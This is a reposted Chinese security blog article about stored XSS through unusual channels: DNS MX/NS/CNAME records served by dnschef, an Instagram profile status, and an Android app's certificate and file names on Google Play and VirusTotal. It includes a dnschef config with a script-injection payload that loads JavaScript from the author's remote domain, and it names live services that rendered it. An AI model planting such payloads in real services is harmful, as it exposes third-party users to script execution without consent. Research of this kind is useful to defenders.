Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >我们要在任何可能的地方测试XSS漏洞

我们要在任何可能的地方测试XSS漏洞

作者头像
FB客服
发布于 2018-02-28 09:14:58
发布于 2018-02-28 09:14:58
1.5K00
代码可运行
举报
文章被收录于专栏:FreeBufFreeBuf
运行总次数:0
代码可运行

在这篇文章中,我准备跟大家讨论几种不同的场景,在这些场景中,不同的服务都会收集各种各样的数据,但它们又无法正确地去处理这些数据。在某些情况下,数据采用的是安全格式存储和传输的,但是由于数据的解析操作以及进一步处理的过程中存在安全问题,将导致无害的字符串变成攻击向量。

XSS和DNS

如果你在搜索引擎中搜索“通过DNS实现XSS”(XSS via DNS)的相关话题,你将会看到类似【参考资料一】和【参考资料二】这种介绍如何在TXT记录中传递XSS攻击向量的文章。但是为什么没有人考虑过其他类型的记录呢?比如说CNAME或NS之类的。因为如果你想把域名作为一个攻击向量的话,你还需要创建自己的NS服务器

也许使用DNSCHEF会是一个好主意。

我使用的子域名是hack.bo0om.ru(任何子域名都可以),并且将我的IP设置成了该域名的NS服务器。接下来修改dnschef.ini并完成dnschef的配置,添加下列记录:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[MX] *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js>[NS] *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js>[CNAME]*.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js>

如果某个在线服务得到了DNS数据之后还将它们打印在了屏幕上,只能说明该服务忘记过滤掉这些数据了。

下面是一些存在XSS漏洞的例子:

· who.is · robtex.com · dnsqueries.com · etc

XSS和Instagram

有一次我只是为了好玩,然后将一段XSS Payload添加到了我Instagram的个人状态中。一开始没发生什么有趣的事,而且这个XSS Payload也是没有攻击性的。

但是之后我发现,这个XSS Payload竟然在另外的域名和在线服务中起作用了,从我的Web服务器日志记录来看,这些域名貌似指向的是社交网络解析器和一些分析服务。下面给出的是其中部分示例:

· findgram.me · imgrab.com · instagy.com · iconosquare.com · tofo.me · photo.sh · gramosphere.com

不过其中有一部分已经修复了这个漏洞。

XSS和Google Play

最近,@Black2Fan给我发了一条信息,并问我能不能够在Google Play应用商店上传存在XSS漏洞的Android App。我当时都不知道竟然还有这种操作!但我感觉可行。于是我自己弄了一个App,然后为这个App生成了一个证书,并将其中的开发者名称和其他数据用XSS向量进行了替换。

我用一些包含恶意代码的文件以及文件路径组成了一个有效的页面标签,并从我自己的域名加载相应的脚本文件。

注:Linux系统支持在文件名中使用特殊字符。

虽然我们可以在文件名中注入自己的脚本代码,但坏消息是这里有30个字符的限制。不幸的是,我手上可以使用的域名都有点长,而且那些只有一个或两个字符的域名估计都已经被注册掉了。但是在现代Web中,你可以使用punycode编码来注册域名,而且现在还有很多免费的punycode域名没有被注册。比如说xn—g3h。所以我注册了一个.ws域名(请参考下图,有个符号这里打不出来,包括点号在内一共四个字符)。

这个App目前仍然可以在Google Play应用商店中找到【传送门】,但是它随时可能被删掉。

而且更加有趣的是,当我将这个App上传到VirusTotal之后,其中的XSS向量竟然触发了反病毒产品Web端面板中的漏洞。哈哈哈…而且除了VirusTotla之外,还有两家天朝的安全厂商也存在这种问题,但这里我就不直接提他们的名字了。

总结

作为一个Bug Hunter,虽然我这一次的发现没能拿到漏洞奖金,但希望可以给大家提供一种新的挖洞思路,其实我也只是为了好玩而已:D不喜勿喷

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-08-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
​ kali linux 渗透测试 之 DNS信息收集
从本节开始,我们从头开始,系统的学习基于Kali Linux的web应用渗透测试。
用户1631416
2018/12/17
5K0
DOM-XSS漏洞挖掘与攻击面延申
跨站脚本攻击(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私、钓鱼欺骗、偷取密码、传播恶意代码等攻击行为。可以分为反射型、存储型、DOM型等,本文主要讲解DOM-XSS漏洞挖掘与攻击面延申。接下来就开门见山,讲解干货吧。
黑伞安全
2020/03/30
3K0
DOM-XSS漏洞挖掘与攻击面延申
XSS知解123
跨站脚本攻击(Cross-Site Scripting),为了避免与 CSS 混淆,一般简称为 XSS。XSS 作为一种典型的主要可以分为 3 种:
madneal
2020/03/10
6550
XSS知解123
干货 | 学习XSS从入门到熟悉
XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。
HACK学习
2021/06/24
5K0
干货 | 学习XSS从入门到熟悉
Subdomain-Takeover子域名接管原理和利用案例
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
全栈工程师修炼指南
2020/10/23
7.4K0
Subdomain-Takeover子域名接管原理和利用案例
谈谈不为人知的 xray 子域名
不管是白帽子用于漏洞挖掘还是企业进行日常安全巡检,web 漏扫首先要问题的问题是解决扫描目标,并找准目标探测入口。
Timeline Sec
2020/11/05
2.2K0
谈谈不为人知的 xray 子域名
一文了解XSS漏洞和常见payload
刷完了XSS challenge和XSS game 对XSS漏洞有了些许认识 在此做个小结与记录
中龙技术
2022/09/30
4.5K0
一文了解XSS漏洞和常见payload
小记 - Web安全
敏感目录:后台目录、上传目录、phpinfo、robots.txt、网站压缩包、Mysql管理接口、安装页面
Naraku
2021/07/29
2.2K0
小记 - Web安全
渗透测试信息收集技巧(1)——DNS收集和子域名收集
获取中间使用的产品和版本通过产品和版本查询是否有漏洞存在,如:struts2反序列化,iis文件解析
zhouzhou的奇妙编程
2024/09/10
5110
干货笔记!一文讲透XSS(跨站脚本)漏洞
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途。
网络安全自修室
2022/03/30
4.7K0
干货笔记!一文讲透XSS(跨站脚本)漏洞
XSS漏洞总结
同源策略 影响源的因素:host,子域名,端口,协议 a.com通过以下代码:
张树臣
2018/12/18
3.6K0
Pikachu漏洞靶场系列之XSS
跨站脚本攻击(Cross-Site Scripting)简称为“CSS”,为避免与前端叠成样式表的缩写”CSS”冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
FB客服
2020/02/20
2.8K0
Pikachu漏洞靶场系列之XSS
渗透测试TIPS之Web(一)
3、一个不错的OSINT工具框架网址:http://osintframework.com/
Jumbo
2018/08/20
2.3K0
渗透测试TIPS之Web(一)
实战 | 记一次赏金2000美元的子域名接管漏洞挖掘
今天,我将分享我如何发现 Fastly 子域接管漏洞并获得2000美金的漏洞赏金。
HACK学习
2023/01/03
1.4K0
实战 | 记一次赏金2000美元的子域名接管漏洞挖掘
绕过 XSS 检测机制
跨站点脚本 (XSS) 是最常见的 Web 应用程序漏洞之一。它可以通过清理用户输入、基于上下文转义输出、正确使用文档对象模型 (DOM) 接收器和源、执行正确的跨源资源共享 (CORS) 策略和其他安全实践来完全防止。尽管这些预防性技术是公共知识,但 Web 应用程序防火墙 (WAF) 或自定义过滤器被广泛用于添加另一层安全性,以保护 Web 应用程序免受人为错误或新发现的攻击向量引入的缺陷的利用。虽然 WAF 供应商仍在尝试机器学习,但正则表达式仍然是检测恶意字符串的最广泛使用的方法。
Khan安全团队
2022/05/17
1.3K0
绕过 XSS 检测机制
跨站的艺术-XSS入门与介绍
什么是XSS XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS,比较合适的方式应该叫做跨站脚本攻击。 跨站脚本攻击是一种常见的web安全漏洞,它主要是指攻击者可以在页面中插入恶意脚本代码,当受害者访问这些页面时,浏览器会解析并执行这些恶意代码,从而达到窃取用户身份/钓鱼/传播恶意代码等行为。 上图就是一个典型的存储型XSS。 什么是Payload? Payload是一个专业术语,中文翻译
云鼎实验室
2018/04/02
1.2K0
跨站的艺术-XSS入门与介绍
白帽赏金平台XSS漏洞模糊测试有效载荷最佳集合 2020版
该备忘清单可用于漏洞猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的payload,并观察响应内容,查找web应用的跨站点脚本漏洞,共计100+条xss漏洞测试小技巧。
瓦都剋
2020/12/17
10.2K0
渗透测试 | 子域名查询、DNS记录查询
https://blog.csdn.net/qq_36119192/article/details/82752515
谢公子
2022/01/13
8.5K0
渗透测试 | 子域名查询、DNS记录查询
万字长文 | 从DVWA靶场到EdgeOne,探索SQL注入、XSS、DDoS的攻击原理和防护
我在刚学习JDBC的时候,在学习视频里记住了一句话:在执行SQL的时候,要使用preparedStatement代替Statement防止sql注入。这可能是第一次接触到关于web防护的问题,只不过那时候初学计算机,只记住了这句话,而没有理解其中的意思。
叫我阿柒啊
2024/07/30
1.2K6
万字长文 | 从DVWA靶场到EdgeOne,探索SQL注入、XSS、DDoS的攻击原理和防护
web漏洞 | XSS(跨站攻击脚本)详解
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击! XSS分为:存储型 、反射型 、DOM型XSS
谢公子
2022/01/13
5.2K0
web漏洞 | XSS(跨站攻击脚本)详解
相关推荐
​ kali linux 渗透测试 之 DNS信息收集
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档